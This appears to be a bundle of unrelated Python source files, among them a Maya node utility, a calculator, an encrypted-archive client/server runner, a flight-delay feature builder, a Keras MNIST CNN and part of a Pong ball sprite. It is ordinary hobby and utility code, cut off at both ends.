    ##print(type(img_3))
    # Total pixel difference: lower means a better template match.
    sum_img = sum(sum(img_3))
    all_sum.append(sum_img)
# --- Stage 3: report the best-matching template ---------------------------
min_of_all = min(all_sum)
print("len = ",len(all_sum))
print("min = ",min_of_all)
for i in range(len(all_sum)):
    print("sum = ",all_sum[i])
    if(min_of_all==all_sum[i]):
        index = i
        break
print(index)
imageshow = cv2.imread(all_plate[index],0)
cv2.imshow("show",imageshow)
print(all_sum)
|
"""
nodes @ utils
"""
import maya.cmds as mc
def remapNode(
    ctrlAt,
    targetAt,
    ctrlMinMax,
    targetMinMax,
    addVal = False
):
    """Wire a remapValue node between a control attribute and a target.

    Maps ``ctrlAt`` from the [min, max] range in ``ctrlMinMax`` onto the
    [min, max] range in ``targetMinMax`` and drives ``targetAt`` with the
    result, summed through a plusMinusAverage node.

    :param ctrlAt: source attribute ("node.attr") driving the remap
    :param targetAt: destination attribute to drive
    :param ctrlMinMax: (inputMin, inputMax) pair for the remap
    :param targetMinMax: (outputMin, outputMax) pair for the remap
    :param addVal: when True, preserve the target's current value by adding
        it to the remapped output (otherwise the offset is 0)
    :return: name of the created remapValue node
    """
    # Renamed locals: the original bound `remapNode` as a local variable,
    # shadowing this function's own name inside its body.
    remap_node = mc.createNode('remapValue', n = 're' + ctrlAt)
    sum_node = mc.createNode('plusMinusAverage') # to get any preexisting values
    if(addVal):
        base_value = mc.getAttr(targetAt)
    else:
        base_value = 0
    mc.setAttr(sum_node + '.input1D[0]', base_value)
    mc.setAttr(remap_node + '.inputMin', ctrlMinMax[0])
    mc.setAttr(remap_node + '.inputMax', ctrlMinMax[1])
    mc.setAttr(remap_node + '.outputMin', targetMinMax[0])
    mc.setAttr(remap_node + '.outputMax', targetMinMax[1])
    mc.connectAttr(ctrlAt, remap_node + '.inputValue')
    mc.connectAttr(remap_node + '.outValue', sum_node + '.input1D[1]')
    mc.connectAttr(sum_node + '.output1D', targetAt)
    return remap_node
import math as _math
def ducks_in_earth(duck_volume, R_EARTH=6378e3):
    """Compute the number of ducks that fit in the earth

    Args:
        duck_volume (float): Volume of one rubber duck [m^3]
        R_EARTH (float): Earth's equatorial radius [m] Default: 6,378,000.0

    Returns:
        num_ducks (int): Number of whole ducks that it would take to fill the Earth
    """
    # Sphere volume (4/3)*pi*r^3, then count whole ducks only.
    earth_volume = (4.0 / 3.0) * _math.pi * R_EARTH ** 3
    return _math.floor(earth_volume / duck_volume)
#calculator program
def add(a,b):
    """Print and return the sum of ``a`` and ``b``.

    The printed output is unchanged; returning the value additionally makes
    the function usable programmatically (callers that ignored the previous
    None return are unaffected).
    """
    result = a + b
    print(result)
    return result
def sub(a,b):
    """Print and return ``a - b`` (printing preserved; return value added
    for programmatic use — backward compatible)."""
    result = a - b
    print(result)
    return result
def multi(a,b):
    """Print and return ``a * b`` (printing preserved; return value added
    for programmatic use — backward compatible)."""
    result = a * b
    print(result)
    return result
def div(a,b):
    """Interactively divide ``a`` by ``b``.

    Asks the user whether to print true division (option 1) or floor
    division (option 2); any other choice prints "invalid".
    Raises ZeroDivisionError when b == 0 and option 1 or 2 is chosen.
    """
    z=int(input("to get value in float select 1 else 2"))
    if(z==1):
        # True division: float result.
        print(a/b)
    elif(z==2):
        # Floor division: integer result for int inputs.
        print(a//b)
    else:
        print("invalid")
def mod(a,b):
    """Print and return ``a % b`` (printing preserved; return value added
    for programmatic use — backward compatible)."""
    result = a % b
    print(result)
    return result
#main
# Interactive menu loop: pick an operation, read two operands, dispatch.
print("BASIC CALCULATOR")
print("#"*7)
c="yes"
# NOTE(review): `c` is never reassigned, so the while condition is always
# true; the loop only terminates via the `break` when the user answers "no".
while c.lower() =="yes":
    print("MENU \n1.)TO ADD \n2.)TO SUBTRACT \n3.)TO MULTIPY \n4.)TO DIVIDE \n5.)MODULO ")
    d=int(input("enter the option"))
    print("enter the values:")
    a=int(input("enter value for a:"))
    b=int(input("enter value for b:"))
    # Dispatch on the chosen menu option.
    if(d==1):
        add(a,b)
    elif(d==2):
        sub(a,b)
    elif(d==3):
        multi(a,b)
    elif(d==4):
        div(a,b)
    elif(d==5):
        mod(a,b)
    else:
        print("invalid")
    # Anything other than an exact "no" keeps the loop running.
    z=input("do you want to continue")
    if(z=="no"):
        print("BYE")
        break
|
"""runner functions for entry points."""
import os
import sys
import argparse
import cmd
import getpass
import pprint
import hashlib
from twisted.internet import reactor, task
from twisted.internet.endpoints import TCP4ServerEndpoint
from twisted.internet.defer import inlineCallbacks
from twisted.python import log
from cryptarchive import constants
from cryptarchive.challenge import Challenge
from cryptarchive.client import CryptarchiveTxClient
from cryptarchive.socketclient import CryptarchiveSocketClient, CryptarchiveSocketConnection
from cryptarchive.server import CryptarchiveServerFactory
from cryptarchive.usermanager import UserManager
from cryptarchive.reconstruct import reconstruct
# Registry of transport name -> client implementation, used to select the
# client class from a command-line option.
CLIENTS = {
    "tx": CryptarchiveTxClient,
    "socket": CryptarchiveSocketClient,
}
class CreateUserPrompt(cmd.Cmd):
    """REPL-loop for creating users.

    Each do_* method implements one interactive command; `cmd` is the raw
    argument string typed after the command name (usually a username or
    userid here).
    """
    def __init__(self, usermanager, ns):
        cmd.Cmd.__init__(self)
        self.usermanager = usermanager  # UserManager handling id/path lookups
        self.ns = ns  # parsed CLI namespace; only .path is used here
        self.prompt = "[{p}]".format(p=os.path.abspath(ns.path))
        self.intro = "Cryptarchive [Python version: {pyv}; protocol version {comv}]\nType 'help' for help.".format(
            pyv=sys.version,
            comv=constants.COM_VERSION,
        )
    def do_quit(self, cmd):
        """quit the REPL-loop"""
        # Returning True tells cmd.Cmd to stop the loop.
        return True
    # Aliases so 'exit' and 'q' behave like 'quit'.
    do_exit = do_q = do_quit
    def do_list_userids(self, cmd):
        """lists the userids."""
        # Each user is one directory under the storage path.
        users = os.listdir(self.ns.path)
        for user in users:
            self.stdout.write(user + "\n")
    def do_get_userid(self, cmd):
        """calculate the userid for the username."""
        uid = self.usermanager.get_userid(cmd)
        self.stdout.write(uid + "\n")
    def do_remove_user_by_name(self, cmd):
        """remove the user with the username"""
        # Resolve the name to an id, then delete that user's directory.
        userid = self.usermanager.get_userid(cmd)
        p = self.usermanager.get_user_path(userid)
        if p.exists():
            p.remove()
        else:
            self.stdout.write("Error: No such user!\n")
    def do_remove_user_by_userid(self, cmd):
        """remove the user with the userid"""
        p = self.usermanager.get_user_path(cmd)
        if p.exists():
            p.remove()
        else:
            self.stdout.write("Error: No such user!\n")
    def do_create_user(self, cmd):
        """create a new user."""
        userid = self.usermanager.get_userid(cmd)
        if self.usermanager.user_exists(userid):
            self.stdout.write("Error: user already exists!\n")
            return
        userpath = self.usermanager.get_user_path(userid)
        password = getpass.getpass("Password for '{un}': ".format(un=cmd))
        # The authblock/hash pair is what the server later uses to verify
        # the user's password challenge.
        authblock, hash = Challenge.generate_authblock_and_hash(password, hash_password=True)
        userpath.makedirs()
        self.usermanager.get_authblock_path(userid).setContent(authblock)
        self.usermanager.get_hash_path(userid).setContent(hash)
    def do_reconstruct_index(self, cmd):
        """attemp reconstruct the index of the user with the userid."""
        p = self.usermanager.get_user_path(cmd)
        if not p.exists():
            self.stdout.write("Error: No such user!\n")
            return
        # decrypt old index
        enc_old_index = p.child(constants.INDEX_FILE_NAME).getContent()
        password = getpass.getpass("Password for '{un}': ".format(un=cmd))
        # NOTE(review): sha256 of a str only works on Python 2; on Python 3
        # getpass returns str and this would need .encode() — confirm the
        # targeted interpreter.
        hp = hashlib.sha256(password).digest()
        conn = CryptarchiveSocketConnection("", "", hp)
        cipher = conn._get_cipher()
        old_index = cipher.decrypt(enc_old_index)
        # Everything in the user dir except the index and auth files is an
        # archived blob that should appear in the rebuilt index.
        filelist = p.listdir()
        for fn in (constants.INDEX_FILE_NAME, "hash.bin", "authblock.bin"):
            if fn in filelist:
                filelist.remove(fn)
        index = reconstruct(old_index, filelist, verbose=True)
        # encrypt new index
        # A fresh cipher is created; presumably the stream cipher state is
        # not reusable after the decrypt — verify against the client code.
        cipher = conn._get_cipher()
        enc_index = cipher.encrypt(index.dumps())
        p.child(constants.INDEX_FILE_NAME).setContent(enc_index)
def scan_dir_for_upload(path, remotebase):
    """
    Recursively collect what is needed to upload the directory *path*.

    :param path: local directory to scan
    :type path: str
    :param remotebase: remote path the contents will be uploaded to
    :type remotebase: str
    :return: A tuple ([directories to create], [(sourcefile, targetfile)])
    :rtype: tuple of (list of str, list of tuples of (str, str))
    """
    dirs, uploads = [], []
    for entry in os.listdir(path):
        local = os.path.join(path, entry)
        remote = os.path.join(remotebase, entry)
        if os.path.isfile(local):
            uploads.append((local, remote))
        elif os.path.isdir(local):
            # remember the directory itself, then descend into it
            dirs.append(remote)
            subdirs, subfiles = scan_dir_for_upload(local, remote)
            dirs.extend(subdirs)
            uploads.extend(subfiles)
        else:
            # neither file nor directory (e.g. special file)
            raise NotImplementedError("Can not handle: {p}".format(p=local))
    return (dirs, uploads)
def scan_dir_for_download(index, remotepath, base):
    """
    Recursively collect what is needed to download the remote directory.

    :param index: index to scan (provides listdir(path) -> [(name, isdir)])
    :param remotepath: remote path to scan
    :type remotepath: str
    :param base: local path to which should be downloaded.
    :type base: str
    :return: A tuple ([directories to create], [(sourcefile, targetfile)])
    :rtype: tuple of (list of str, list of tuples of (str, str))
    """
    dirs, downloads = [], []
    for name, is_directory in index.listdir(remotepath):
        # index entries may carry leading slashes; strip them all
        name = name.lstrip("/")
        remote = os.path.join(remotepath, name)
        local = os.path.join(base, name)
        if is_directory:
            dirs.append(local)
            subdirs, subfiles = scan_dir_for_download(index, remote, local)
            dirs.extend(subdirs)
            downloads.extend(subfiles)
        else:
            downloads.append((remote, local))
    return (dirs, downloads)
def server_main():
    """entry point for the server.

    Parses CLI arguments, optionally drops into the user-management
    REPL (--manage-users), otherwise starts the twisted TCP server
    and blocks in reactor.run(). Python 2 syntax (print statement).
    """
    parser = argparse.ArgumentParser(description="The Cryptarchive Server")
    parser.add_argument("path", action="store", help="path of files")
    parser.add_argument("-i", "--interface", action="store", help="interface to listen on", default="0.0.0.0")
    parser.add_argument("-p", "--port", action="store", type=int, default=constants.DEFAULT_PORT, help="port to listen on")
    parser.add_argument("-v", "--verbose", action="store_true", help="be more verbose")
    parser.add_argument("--manage-users", action="store_true", help="open a REPL-loop for creating users")
    ns = parser.parse_args()
    if not os.path.exists(ns.path):
        print "No such file or directory: '{p}'".format(p=ns.path)
        sys.exit(2)
    if ns.manage_users:
        # management mode: run the REPL instead of serving, then exit
        usermanager = UserManager(ns.path)
        cmdo = CreateUserPrompt(usermanager, ns)
        cmdo.prompt = cmdo.prompt.format(p=ns.path)
        cmdo.cmdloop()
        sys.exit(0)
    if ns.verbose:
        log.startLogging(sys.stdout)
    factory = CryptarchiveServerFactory(ns.path, verbose=ns.verbose)
    ep = TCP4ServerEndpoint(reactor, port=ns.port, interface=ns.interface)
    ep.listen(factory)
    # blocks until the reactor is stopped
    reactor.run()
def client_main():
    """entry point for the console client."""
    parser = argparse.ArgumentParser(description="The Cryptarchive commandline client")
    parser.add_argument("-v", "--verbose", action="store_true", help="be more verbose")
    parser.add_argument("host", action="store", help="host to connect to")
    parser.add_argument("-p", "--port", action="store", type=int, default=constants.DEFAULT_PORT, help="port to connect to")
    parser.add_argument("--nohash", action="store_false", dest="hash_password", help="Do not hash password")
    parser.add_argument("username", action="store", help="username")
    parser.add_argument("password", action="store", help="password")
    parser.add_argument("action", action="store", choices=["ls", "mkdir", "show-index", "upload", "download", "delete", "download-raw", "mv"], help="what to do")
    parser.add_argument("orgpath", action="store", help="path to read from / list / create / ...")
    parser.add_argument("dest", action="store", help="path to write to", nargs="?", default=None)
    parser.add_argument("-c", "--client", action="store", choices=["tx", "socket"], default="tx")
    ns = parser.parse_args()

    if ns.verbose:
        log.startLogging(sys.stdout)

    # Look up the implementation class and connect with the shared settings.
    client = CLIENTS[ns.client](
        host=ns.host,
        port=ns.port,
        username=ns.username,
        password=ns.password,
        hash_password=ns.hash_password,
    )

    # The tx client must run under the twisted reactor; the socket
    # client is plain blocking code.
    if ns.client == "tx":
        task.react(run_tx_client, (client, ns))
    elif ns.client == "socket":
        run_socket_client(client, ns)
    else:
        # unreachable: argparse restricts the choices above
        raise ValueError("Unexpected value for -c/--client")
@inlineCallbacks
def run_tx_client(reactor, client, ns):
    """runs the twisted client.

    Dispatches on ns.action and performs exactly one operation against
    the server, yielding on every deferred. Python 2 syntax
    (print statement) — this module targets py2/twisted.

    :param reactor: twisted reactor (supplied by task.react)
    :param client: connected tx client instance
    :param ns: parsed argparse namespace
    """
    # the raw download is the only action that works without the index
    if ns.action != "download-raw":
        yield client.retrieve_index()
    if ns.action == "ls":
        content = yield client.listdir(ns.orgpath)
        for fn in content:
            print fn
    elif ns.action == "mkdir":
        yield client.mkdir(ns.orgpath)
    elif ns.action == "show-index":
        pprint.pprint(client._index._index)
    elif ns.action == "upload":
        # a directory upload is expanded into mkdirs + single-file uploads
        if os.path.isdir(ns.orgpath):
            dtc, ftu = scan_dir_for_upload(ns.orgpath, ns.dest)
        else:
            dtc = []
            ftu = [(ns.orgpath, ns.dest)]
        for dn in dtc:
            yield client.mkdir(dn)
        for lp, rp in ftu:
            with open(lp, "rb") as fin:
                print("Uploading '{o}' as '{d}'...".format(o=lp, d=rp))
                yield client.upload(fin, rp)
    elif ns.action == "download":
        # a directory download is expanded into local mkdirs + file downloads
        if client._index.dir_exists(ns.orgpath):
            dtc, ftu = scan_dir_for_download(client._index, ns.orgpath, ns.dest)
        else:
            dtc = []
            ftu = [(ns.orgpath, ns.dest)]
        for dn in dtc:
            if not os.path.exists(dn):
                os.mkdir(dn)
        for rp, lp in ftu:
            with open(lp, "wb") as fout:
                print("Downloading '{r}' as '{l}'...".format(r=rp, l=lp))
                yield client.download(rp, fout)
    elif ns.action == "download-raw":
        with open(ns.dest, "wb") as fout:
            yield client.download_raw(ns.orgpath, fout)
    elif ns.action == "delete":
        yield client.delete(ns.orgpath)
    elif ns.action == "mv":
        yield client.move(ns.orgpath, ns.dest)
def run_socket_client(client, ns):
    """runs the socket client.

    Blocking twin of run_tx_client(): same action dispatch, but every
    call is synchronous. Python 2 syntax (print statement).

    :param client: connected socket client instance
    :param ns: parsed argparse namespace
    """
    # the raw download is the only action that works without the index
    if ns.action != "download-raw":
        client.retrieve_index()
    if ns.action == "ls":
        content = client.listdir(ns.orgpath)
        for fn in content:
            print fn
    elif ns.action == "mkdir":
        client.mkdir(ns.orgpath)
    elif ns.action == "show-index":
        pprint.pprint(client._index._index)
    elif ns.action == "upload":
        # a directory upload is expanded into mkdirs + single-file uploads
        if os.path.isdir(ns.orgpath):
            dtc, ftu = scan_dir_for_upload(ns.orgpath, ns.dest)
        else:
            dtc = []
            ftu = [(ns.orgpath, ns.dest)]
        for dn in dtc:
            client.mkdir(dn)
        for lp, rp in ftu:
            with open(lp, "rb") as fin:
                print("Uploading '{o}' as '{d}'...".format(o=lp, d=rp))
                client.upload(fin, rp)
    elif ns.action == "download":
        # a directory download is expanded into local mkdirs + file downloads
        if client._index.dir_exists(ns.orgpath):
            dtc, ftu = scan_dir_for_download(client._index, ns.orgpath, ns.dest)
        else:
            dtc = []
            ftu = [(ns.orgpath, ns.dest)]
        for dn in dtc:
            if not os.path.exists(dn):
                os.mkdir(dn)
        for rp, lp in ftu:
            with open(lp, "wb") as fout:
                print("Downloading '{r}' as '{l}'...".format(r=rp, l=lp))
                client.download(rp, fout)
    elif ns.action == "download-raw":
        with open(ns.dest, "wb") as fout:
            client.download_raw(ns.orgpath, fout)
    elif ns.action == "delete":
        client.delete(ns.orgpath)
    elif ns.action == "mv":
        client.move(ns.orgpath, ns.dest)
|
from datetime import datetime
from flight_delay_prediction.constant import CATEGORICAL_INPUTS, CONTINUOUS_INPUTS, AIRPORTS, INPUT_NAMES, TEMPERATURES, \
PRECIPITATION, VISIBILITY, WINDSPEED
from flight_delay_prediction.errors import *
from flight_delay_prediction.resources_loader import Resources
from flight_delay_prediction.weather.weather_api import WeatherAPI
from flight_delay_prediction.utils import get_minutes_timedelta
from flight_delay_prediction.weather.weather_caching import WeatherPool
class ModelInputBuilder:
    """
    Builds the feature dict fed to the flight-delay model.

    Params need to contain values for keys:
    carrier_code, origin_airport, destination_airport, origin_dt, destination_dt
    """

    def __init__(self, params, mock_weather=False):
        # Reject requests that do not carry exactly the expected keys.
        if not params.keys() == {'carrier_code',
                                 'origin_airport', 'destination_airport',
                                 'origin_dt', 'destination_dt'}:
            raise WrongRequestParameters()
        self.inputs = {}
        self.params = params
        # True -> skip the weather API and use fixed placeholder values
        self.mock_weather = mock_weather
        self.set_categorical()
        self.set_continuous()

    def get_weather(self):
        """Return weather features for both the origin and destination airport."""
        weather = {}
        weather_origin = self._access_weather(self.params['origin_airport'],
                                              self.params['origin_dt'],
                                              AIRPORTS['origin'])
        weather.update(weather_origin)
        weather_destination = self._access_weather(self.params['destination_airport'],
                                                   self.params['destination_dt'],
                                                   AIRPORTS['destination'])
        weather.update(weather_destination)
        return weather

    def _access_weather(self, iata_code, dt, location):
        """Fetch the weather for one airport, or canned values when mocking."""
        if self.mock_weather:
            return {TEMPERATURES[location]: 67, PRECIPITATION[location]: 0,
                    VISIBILITY[location]: 9, WINDSPEED[location]: 16}
        weather = WeatherPool.get_weather(iata_code, dt, location)
        return weather

    def set_categorical(self):
        """Fill the categorical model inputs (carrier, airports, date parts)."""
        # parse the departure timestamp once instead of three times
        origin_dt = datetime.strptime(self.params['origin_dt'], WeatherAPI.datetime_format)
        categorical = {'carrier_code': self.params['carrier_code'],
                       'origin_airport': self.params['origin_airport'],
                       'destination_airport': self.params['destination_airport'],
                       'day': str(origin_dt.day),
                       'month': str(origin_dt.month),
                       'weekday': str(origin_dt.weekday())}
        self.inputs.update(categorical)
        assert categorical.keys() == set(CATEGORICAL_INPUTS)

    def set_continuous(self):
        """Fill the continuous model inputs: weather, departure time, elapsed time."""
        continuous = self.get_weather()
        # minutes since midnight of the scheduled departure
        # (the original comment said "seconds", but the value is // 60)
        departure = datetime.strptime(self.params['origin_dt'], WeatherAPI.datetime_format)
        departure = (departure - datetime(departure.year, departure.month, departure.day)).seconds // 60
        continuous['scheduled_departure_dt'] = departure
        # scheduled in-air time of the flight
        continuous['scheduled_elapsed_time'] = get_minutes_timedelta(
            Resources.airport_codes[self.inputs['origin_airport']],
            Resources.airport_codes[self.inputs['destination_airport']],
            datetime.strptime(self.params['origin_dt'], WeatherAPI.datetime_format),
            datetime.strptime(self.params['destination_dt'], WeatherAPI.datetime_format)
        )
        self.inputs.update(continuous)
        assert continuous.keys() == set(CONTINUOUS_INPUTS)

    def _is_valid(self):
        """True when every expected input name has been filled in."""
        return self.inputs.keys() == INPUT_NAMES

    def build(self):
        """Return the completed input dict, or raise if inputs are missing."""
        if self._is_valid():
            return self.inputs
        # BUGFIX: report the *missing* inputs (expected minus present); the
        # original computed present-minus-expected, which is empty exactly
        # when inputs are missing, and the message also lacked a space.
        raise IncompleteModelInputError(f'{set(INPUT_NAMES) - self.inputs.keys()} '
                                        f'inputs are missing from ModelInputBuilder')
|
import numpy as np
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Dropout, Flatten
from keras.layers.normalization import BatchNormalization
from keras.layers import Conv2D, MaxPooling2D
from keras.utils import np_utils
from keras import backend as K
"""Odmah po importu se izvrsi ovo sve sto je u telu"""
# da je np.random.seed(0) uvek bi random davao iste brojeve...
# Fixed seed so every run draws the same "random" numbers (reproducibility).
np.random.seed(1)
numberEpochs = 10  # training epochs
numberOutput = 10  # size of the output layer (digits 0-9)
n_classes = 10     # number of label classes for one-hot encoding
def data_preparation(X_train, Y_train, X_test, Y_test):
    """Reshape MNIST images to NHWC, scale to [0, 1] and one-hot the labels."""
    img_w = X_train[0].shape[0]
    img_h = X_train[0].shape[1]
    # add a trailing single-channel axis: (n, h, w) -> (n, h, w, 1),
    # then scale the uint8 pixels into [0, 1] floats
    X_train = X_train.reshape(X_train.shape[0], img_h, img_w, 1).astype('float32') / 255
    X_test = X_test.reshape(X_test.shape[0], img_h, img_w, 1).astype('float32') / 255
    # binary (one-hot) matrix representation of the digit labels
    Y_train = np_utils.to_categorical(Y_train, n_classes)
    Y_test = np_utils.to_categorical(Y_test, n_classes)
    return (X_train, Y_train), (X_test, Y_test)
# Load MNIST and prepare it once at import time.
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# Image dimensions taken from the first sample (28x28 for MNIST).
width = x_train[0].shape[0]
height = x_train[0].shape[1]
(x_train, y_train), (x_test, y_test) = data_preparation(x_train, y_train, x_test, y_test)
def add_layers(model, shape):
    """Stack the baseline CNN layers onto *model* and return it."""
    # first layer
    model.add(Conv2D(filters=32, kernel_size=(3, 3), input_shape=shape))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2), strides=2))
    # second layer
    model.add(Conv2D(filters=16, kernel_size=(3, 3)))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Dropout(0.25))  # randomly zeroes a fraction of inputs each update; helps prevent overfitting
    model.add(Flatten())  # Flattens the input. Does not affect the batch size.
    # newer Keras API: units= instead of output_dim=
    model.add(Dense(units=128))
    model.add(Activation('relu'))
    model.add(Dense(units=64))
    model.add(Activation('relu'))
    # output layer
    model.add(Dense(numberOutput))
    model.add(Activation('softmax'))
    return model
def add_layers_medium(model, shape):
    """Stack a deeper, three-conv-block CNN onto *model* and return it."""
    # first layer
    model.add(Conv2D(filters=32, kernel_size=(3, 3), padding='same',
                     input_shape=shape))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Conv2D(filters=64, kernel_size=(3, 3), padding='same'))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Conv2D(filters=64, kernel_size=(3, 3), padding='same'))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Flatten())
    # Densely connected layers
    model.add(Dense(128))
    model.add(Activation('relu'))
    # output layer
    model.add(Dense(numberOutput))
    model.add(Activation('softmax'))
    return model
# predugo [losi acc i losss....]
def add_layers_kaggle(model, shape):
    """Stack a Kaggle-style CNN (he_normal init, heavy dropout) onto *model*.

    Original author's note: trains too long with poor acc/loss.
    """
    # first layer
    model.add(Conv2D(32, kernel_size=(3, 3), kernel_initializer='he_normal', input_shape=shape))
    model.add(Activation('relu'))
    model.add(Conv2D(32, kernel_size=(3, 3), kernel_initializer='he_normal'))
    model.add(Activation('relu'))
    model.add(MaxPooling2D((2, 2)))
    model.add(Dropout(0.20))
    model.add(Conv2D(64, (3, 3), padding='same', kernel_initializer='he_normal'))
    model.add(Activation('relu'))
    model.add(Conv2D(64, (3, 3), padding='same', kernel_initializer='he_normal'))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Dropout(0.25))
    model.add(Conv2D(128, (3, 3), padding='same', kernel_initializer='he_normal'))
    model.add(Activation('relu'))
    model.add(Dropout(0.25))
    model.add(Flatten())
    model.add(Dense(128))
    model.add(Activation('relu'))
    model.add(BatchNormalization())
    # output layer
    model.add(Dense(numberOutput))
    model.add(Activation('softmax'))
    return model
def init_method():
    """Assemble the CNN for the MNIST images and print its summary."""
    # channels_last (the default data format): (rows, cols, channels)
    input_shape = (width, height, 1)
    model = Sequential()
    model = add_layers(model, input_shape)
    print(model.summary())
    return model
def get_model():
    """Rebuild the architecture and load the pretrained weights from disk."""
    net = init_method()
    net.load_weights("neural_network.h5")
    return net
def train_model():
    """Train the CNN on MNIST, report test accuracy and persist the weights."""
    model = init_method()
    model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
    # fit on the training set, validating against the test set each epoch
    model.fit(x_train, y_train, batch_size=128, epochs=numberEpochs,
              validation_data=(x_test, y_test))
    score = model.evaluate(x_test, y_test, verbose=1)
    print("Accuracy: %.2f%%" % (score[1] * 100))
    model.save_weights("neural_network.h5")
    return model
# laksa nm
# (X_train, y_train), (X_test, y_test) = mnist.load_data()
# building the input vector from the 28x28 pixels
# X_train = X_train.reshape(60000, 784)
# X_test = X_test.reshape(10000, 784)
# X_train = X_train.astype('float32')
# X_test = X_test.astype('float32')
#
# # normalizing the data to help with the training
# X_train /= 255
# X_test /= 255
#
# n_classes = 10
# Y_train = np_utils.to_categorical(y_train, n_classes)
# Y_test = np_utils.to_categorical(y_test, n_classes)
# building a linear stack of layers with the sequential model
# model = Sequential()
# model.add(Dense(512, input_shape=(784,), activation="relu"))
# # model.add(Activation('relu'))
# model.add(Dropout(0.2))
#
# model.add(Dense(512, activation="relu"))
# model.add(Activation('relu'))
# model.add(Dropout(0.2))
#
# model.add(Dense(512))
# model.add(Activation('relu'))
# model.add(Dropout(0.2))
#
# model.add(Dense(10))
# model.add(Activation('softmax'))
#
# model.compile(loss='categorical_crossentropy', metrics=['accuracy'], optimizer='adam')
#
# # training the model and saving metrics in history
# history = model.fit(x_train, x_train,
# batch_size=128, epochs=10,
# verbose=2,
# validation_data=(x_test, y_test))
#
# model.save('model.h5')
|
#!/usr/bin/python
"""Ball used in pong"""
import pygame
from event import Event
import math
import random
# RGB colors used to draw the ball
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
BALL_BORDER = 1  # Width of the border around the ball
# caps applied when the ball speeds up after paddle hits
MAX_HORIZONTAL_VELOCITY = 6
MAX_VERTICAL_VELOCITY = 4
class Ball(pygame.sprite.DirtySprite):
    """Ball used for Pong"""

    def __init__(self, position, paddles, velocity, surface, playarea):
        # call the parent class init
        """
        :param position: Pygame Rect describing the ball
        :param paddles: Reference to the paddles for collision checking
        :param velocity: Initial velocity of the ball
        :param surface: pygame surface
        :param playarea: area within the surface used for gameplay
        """
        pygame.sprite.DirtySprite.__init__(self)
        # black square with a white inner rectangle (BALL_BORDER px border)
        self.image = pygame.Surface([position.width, position.height])
        self.image.fill(BLACK)
        white_center = pygame.Rect(
            (BALL_BORDER, BALL_BORDER, position.width - 2 * BALL_BORDER,
             position.height - 2 * BALL_BORDER))
        self.image.fill(WHITE, white_center)
        self.rect = self.image.get_rect()
        self.rect.top = position.top
        self.rect.left = position.left
        self.dirty = 2  # ball is always moving
        self.paddles = paddles
        self.surface = surface
        # keep a private copy so later mutation of velocity does not
        # change the reset velocity used after a score
        self._initial_velocity = list(velocity)
        self.velocity = list(velocity)
        # observer events fired on scores / projected paddle intercepts
        self.point_scored = Event()
        self.left_paddle_intercept = Event()
        self.right_paddle_intercept = Event()
        self.need_updated_intercept_position = True
        self.playarea = pygame.Rect(playarea)
        # gap between the surface edges and the playarea edges
        self.top_bottom_offset = \
            (self.surface.get_height() - self.playarea.height) / 2
        self.left_right_offset = \
            (self.surface.get_width() - self.playarea.width) / 2
        self.force_score_side = "none"
        self.paddle_track_to = [0, 0]

    @property
    def initial_velocity(self):
        # velocity the ball is reset towards after a score
        return self._initial_velocity

    @initial_velocity.setter
    def initial_velocity(self, value):
        assert isinstance(value, list)
        self._initial_velocity = value

    def force_score(self, side):
        """forces the ball to score a point
        :param side: the side that will be forced to allow a score
        :raises ValueError: if side is not 'left', 'right' or 'none'
        """
        sides = ['left', 'right', 'none']
        if not side in sides:
            raise ValueError("The side passed in, {}, is not valid".format(side))
        self.force_score_side = side

    def update_intercept_location(self):
        """ Converts the velocity and location to an intercept location.

        Projects where the ball will cross the left/right edge (via sine
        ratios on the velocity angle) and fires the matching intercept
        event with that height so the AI paddle can track it.
        NOTE(review): assumes velocity[0] != 0 — the division below would
        raise ZeroDivisionError otherwise.
        """
        self.need_updated_intercept_position = False
        # we convert to int because that's how the ball moves across the screen.
        # This prevents scenarios where the ratio is 3.9/2.0 which causes the
        # angle returned to be inaccurate and results in missed balls
        angle_b = math.degrees(math.atan(math.fabs(int(self.velocity[1])) /
                                         math.fabs(int(self.velocity[0]))))
        # print(self.velocity)
        angle_c = 180 - (90 + angle_b)
        left = False
        if self.velocity[0] < 0:  # Heading left (origin is 0)
            distance_c = self.rect.left - self.left_right_offset
            left = True
        else:
            # - self.left_right_offset is already included in the play_area
            distance_c = self.playarea.width + self.left_right_offset - \
                (self.rect.left + self.rect.width)
            #distance_c = self.play_area.width - self._rect.left
        down = False
        if self.velocity[1] > 0:
            down = True
        # vertical travel before reaching the wall, from the sine ratios
        height = (distance_c * math.sin(math.radians(angle_b))) / math.sin(math.radians(angle_c))
        #height += self._rect[3] / 2
        if down is True:
            height = self.rect.centery + height
        else:
            height = self.rect.centery - height
        # Here we check to see if self.force_score = none. If it is 'left'
        # or 'right' we fudge the intercept position to hopefully miss.
        if left is True:
            #if self.force_score_side == "left": height += miss_value
            self.left_paddle_intercept(height)
            self.paddle_track_to[0] = height
            #print 'projected left exit location ' + str(height)
        else:
            #if self.force_score_side == "right": height += miss_value
            self.right_paddle_intercept(height)
            self.paddle_track_to[1] = height
            #print 'projected right exit location ' + str(height)

    def update(self, surface, original_background):
        """
        update is provided for DirtySprite

        Moves the ball one tick: paddle collisions (with deflection and
        5% speed-up, both capped), wall bounces, and left/right scoring
        with a reset to the centre at a randomized velocity.
        :param surface:
        :param original_background:
        :return:
        """
        # tentative position after applying the current velocity
        t_position = pygame.Rect((self.rect.left + self.velocity[0],
                                  self.rect.top + self.velocity[1],
                                  self.rect.width, self.rect.height))
        # Check collision with paddles
        for paddle in self.paddles:
            if t_position.colliderect(paddle.rect) == 1:  # Collision occurred
                # print('collision - velocity in = ', self.velocity)
                paddle_deflection = paddle.get_deflection_value(self.rect.centery)
                assert isinstance(paddle_deflection, int)
                # add paddle "spin" and reverse/accelerate, both capped
                if math.fabs(self.velocity[1] + paddle_deflection) \
